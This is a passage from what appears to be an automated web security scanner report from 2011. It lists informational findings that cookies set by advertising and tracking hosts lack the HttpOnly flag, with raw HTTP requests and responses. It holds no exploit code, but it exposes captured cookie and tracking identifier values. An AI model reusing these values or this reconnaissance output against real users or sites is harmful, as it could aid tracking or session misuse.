rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2ZL1poyhgAWP5Eo4e070H87Tzw09roY7rZdAWjngdRmX/KB7PAAOyjiwYeh7miSD9WVLs6TEH5yFeQMoXR7TX5IGiGS1ndQrB+MUwUCLY9LCtG1RUIO8T4vZ7TVwpd5UYsttQEEGDrZMobaomRjlr/jOhiOCcTQ9xQb9+ZxLwz0+XUu5YIKhOmjxiMJpwZRR2dIELXMjyf29sb7qjSf1Cix1HEHGuFpdUeIBuWDX/LHHt2MiG9lc0z1DeVzP0JmoTLjwwgU8QnYjXZP5h7MLvOvy5Hymf/1o0ysHCfLP/hOTb27GJKboToNs+qLeJdi/prBMgyzz98mazXxKguLHx0T6OeIB0PFPL6wACVYR6Ss2TVPNWnEuLhdKUBnQHQD8t0djP5BPGHOXR8OLftKDBRxmzGctcKoQOzTlSEDxC80OuWqDdPJHqjRSjgTGt+4RCu7tIz3Lg+9m0WFADgAMwUuCcKxsNJVcSXrmpttM1kVFohWmbAhJyoJMnsd3Bi86iEN0j8kjNF2ZYuvko2nx2Z4sOKKMCmfUT7V/7NRkPPlGNNxlyTn0WoXHoJSGYBllHj6qOSoPVRfiR+b8bcEwaolUKPwotA1Dwps6Z+UFnBwp59XoXSsqM7I/VqpXmvrUdXX/QRWAvo8riXgIu14uzn2Dsizmta9r0eTSn90Szvh5JZONR+QJDh6/TgEWiKAe9//gYZ3Y/wDkkP7wA5d+GLp0fc7Dkt3R16oEsZlK68W7P3GU2X1eitDFg/FxxQBgbyA8Hxqyan5DuymrD8OpRMtI5zglPp8dxSbbwq3txcUmfTAAs5v255PBJekiQOY/qhYL40pS+qFZSnBeiC4mbirYXmLou2NCIgl80u+Xyf5s="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Set-Cookie: NETID01=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_J06575=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_I07714=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pDT9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ymv_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETID01=optout; Domain=.revsci.net; Expires=Thu, 27-Aug-2043 11:14:04 GMT; Path=/
Location: http://privacy.revsci.net/optout/optoutv.aspx?cs=True&v=1&p=http%3A%2F%2Fwww.networkadvertising.org%2F
Content-Length: 0
Date: Sun, 04 Sep 2011 11:14:03 GMT


16.167. http://profile.live.com/badge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /badge

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /badge HTTP/1.1
Host: profile.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Imf: 7a3bb2c5-d380-48e6-94fb-3d74eac8b45c
Set-Cookie: E=P:j1j9ytA4zog=:UBh/CRO4RZvxuHgK6BEl/MnlWy6fCJheTBYGAWiy9/k=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: E=P:j1j9ytA4zog=:UBh/CRO4RZvxuHgK6BEl/MnlWy6fCJheTBYGAWiy9/k=:F; domain=.live.com; path=/
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sun, 04-Sep-2011 02:38:11 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sun, 11-Sep-2011 04:18:11 GMT; path=/
Set-Cookie: sc_clustbl_142=fbdbae74dce5e0af; domain=profile.live.com; expires=Tue, 04-Oct-2011 04:18:11 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BAYXXXXXC552 V: 1 D: 8/14/2011
Date: Sun, 04 Sep 2011 04:18:11 GMT
Connection: close
Content-Length: 3109


<html>
<head>
<noscript><meta http-equiv="refresh" content="2;url=http&#58;//profile.live.com/" /></noscript>
<script type="text/javascript">//<![CDATA[
var _d=document,_dh=_d
...[SNIP]...

16.168. http://property.ndtv.com/ndtv_redirect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://property.ndtv.com
Path:   /ndtv_redirect.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ndtv_redirect.php HTTP/1.1
Host: property.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:18:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: ipcampaign=6790000000; path=/; domain=.indiaproperty.com
Set-Cookie: partner_channel=6790000000; path=/; domain=.indiaproperty.com
Vary: Accept-Encoding
Content-Length: 1179
Connection: close
Content-Type: text/html; charset=UTF-8

<img src='http://www.indiaproperty.com/ndtvcookie.php?referrer=6790000000&page=ndtv' height='0' width='0' />    <html>
       <body>
           <img src='http://server.indiaproperty.com/IP_Campaign/tracking.php?secti
...[SNIP]...

16.169. http://px.owneriq.net/naioptout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://px.owneriq.net
Path:   /naioptout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /naioptout?nocache=0.8888346 HTTP/1.1
Host: px.owneriq.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.13
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://px.owneriq.net/naioptoutcheck
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Sun, 04 Sep 2011 11:15:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 11:15:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ss=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: sg=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: si=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: sgeo=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: rpq=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: apq=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: oxuuid=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: gguuid=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: abuuid=deleted; expires=Sat, 04-Sep-2010 11:15:50 GMT; path=/; domain=.owneriq.net
Set-Cookie: optout=optout; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.owneriq.net


16.170. http://r.casalemedia.com/rum  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /rum

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rum?cm_dsp_id=3&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921 HTTP/1.1
Host: r.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMIMP=102679&1315097282; CMS=65131&1314825471&95308&1314825468&102679&1315097055; CMD1=AAFehU5iyswAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMRUM2=04000000002925993182975414771; CMST=TmLhpk5i4aYB; CMSC=TmLhpg**; CMDD=AAHRwAE*; CMD2=AAFbVk5i4aYAAdHAAAOPLAEBAA**

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 02:40:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 02:40:06 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMID=f7My40gDlEgAAAwSA7UAAAAH;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 02:40:06 GMT
Set-Cookie: CMTS='';domain=casalemedia.com;path=/;expires=Sat, 03 Sep 2011 02:40:06 GMT;Discard
Set-Cookie: CMTP='';domain=casalemedia.com;path=/;expires=Sat, 03 Sep 2011 02:40:06 GMT;Discard
Set-Cookie: CMPS=188;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 02:40:06 GMT
Set-Cookie: CMPP=011;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 02:40:06 GMT
Set-Cookie: CMRUM2=04000000002925993182975414771%5D%5D%3E%3E&febb72d3938b2974c9559972&03000000004e62cac5-3093-5789-301b-6f4e7fbf3921&8742c8826e740e8c)!(sn%3D*)!(sn%3D*&14000000006731d4ad-7dae-4402-b507-a0bc233d79fb;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 02:40:06 GMT
Set-Cookie: CMST=TmLk605i5QYX;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 02:40:06 GMT

GIF89a.............!.......,...........D..;

16.171. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&rtb=uuid%3D4e62cac5-3093-5789-301b-6f4e7fbf3921 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=5730&cb=1737249030&ct0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A//www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917//pubclick//Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; s=2307fe4f-797f-4f4b-9132-9e335f582595; p=1315103289

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:52 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=fbe566bc-e601-4d14-a2ef-601df1907cf9; expires=Tue, 03-Sep-2013 03:29:52 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

16.172. http://r.pixel.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.pixel.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1330&id=6&format=image&r= HTTP/1.1
Host: r.pixel.trafficmp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: rth=2-lpay4l-44~1nwul~1~1-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-; uid2=499d34e38-cf7e-49f0-bcb0-ea11d282884d-gquw3zmv; T_efdn=44%3A1nwul%3A1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: T_efdn=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l7bw=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: T_czb=ltp%3A1oe9c%3A1; Domain=trafficmp.com; Expires=Mon, 03-Sep-2012 03:58:45 GMT; Path=/
Set-Cookie: rth=2-lpay4l-ltp~1oe9c~1~1-44~1nwul~1~1-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-; Domain=trafficmp.com; Expires=Mon, 03-Sep-2012 03:58:45 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 03:58:44 GMT

GIF89a.............!.......,...........D..;

16.173. http://r.turn.com/r/bd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=54&cver=1&uid=6422714091563403120 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; uid=2925993182975414771; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 03:29:44 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 03:29:44 GMT

GIF89a.............!.......,...........D..;

16.174. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=6YtkBrDAE9IC5hFHjnB-yIAsYMfEACa-nO9phD-NOvPPVx7awJtIT5bFbQ7adJJ3wc3E_rvvWKH9Who8_my78Q&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 02:28:19 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 02:28:18 GMT

GIF89a.............!.......,...........D..;

16.175. http://r1-ads.ace.advertising.com/click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700%5E999589%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700%5E999589%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700%5E999589%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 04 Sep 2011 04:18:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125
Date: Sun, 04 Sep 2011 04:18:17 GMT
Connection: close
Set-Cookie: C2=KwvYO9aFHYIiGt7sQdwSka0uSKMCdbdxlJoII0bSFAH; domain=advertising.com; expires=Tue, 03-Sep-2013 04:18:17 GMT; path=/
Set-Cookie: 36466465=_4e62e207,0637251025,804611^994513^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 88962478=_4e62e208,7215437176,800700^999589^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7215437176=_4e62e208,7215437176,800700^999589^1183^0,1_; domain=advertising.com; path=/click
Set-Cookie: 0866435731=_4e62ea87,0866435731,0^0^0^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7114534657=_4e62ea86,7114534657,0^0^0^0,0_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

16.176. http://r1-ads.ace.advertising.com/click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700^999589^1183^0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700^999589^1183^0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700^999589^1183^0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 04 Sep 2011 04:18:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125
Date: Sun, 04 Sep 2011 04:18:15 GMT
Connection: close
Set-Cookie: C2=HwvYO9aFHYIiGt7sQdwSka0uSKMCdbdxlJoII0bSFAH; domain=advertising.com; expires=Tue, 03-Sep-2013 04:18:15 GMT; path=/
Set-Cookie: 36466465=_4e62e207,0637251025,804611^994513^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 88962478=_4e62e208,7215437176,800700^999589^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7215437176=_4e62e208,7215437176,800700^999589^1183^0,1_; domain=advertising.com; path=/click
Set-Cookie: 0866435731=_4e62ea87,0866435731,0^0^0^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7114534657=_4e62ea86,7114534657,0^0^0^0,0_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

16.177. http://r1-ads.ace.advertising.com/ctst=1/site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /ctst=1/site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ctst=1/site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=drsYO9aFHYIiGW8sQdwSkaYxSKMCdbdBwB; GUID=MTMxNTA5NzMwOTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; A07L=CT-1; ACID=Rq690013151032380008; ASCID=Rq690013151032380008

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994513.804611.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 04 Sep 2011 02:27:19 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 02:27:19 GMT
Content-Length: 1535
Connection: close
Set-Cookie: C2=HIuYO9aFHYIiGD8sQdwSkaMwSKMCdbdRrxK4IEscGAHtnggnraAc; domain=advertising.com; expires=Tue, 03-Sep-2013 02:27:19 GMT; path=/
Set-Cookie: F1=Bcg4i5EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 03-Sep-2013 02:27:19 GMT; path=/
Set-Cookie: BASE=oTwUgn8fYrESn1B!; domain=advertising.com; expires=Tue, 03-Sep-2013 02:27:19 GMT; path=/
Set-Cookie: ROLL=XpwfYsHr/Y/PQCL!; domain=advertising.com; expires=Tue, 03-Sep-2013 02:27:19 GMT; path=/
Set-Cookie: 36466465=_4e62e207,0637251025,804611^994513^1183^0,0_; domain=advertising.com; path=/click

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE>&nbsp;</TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

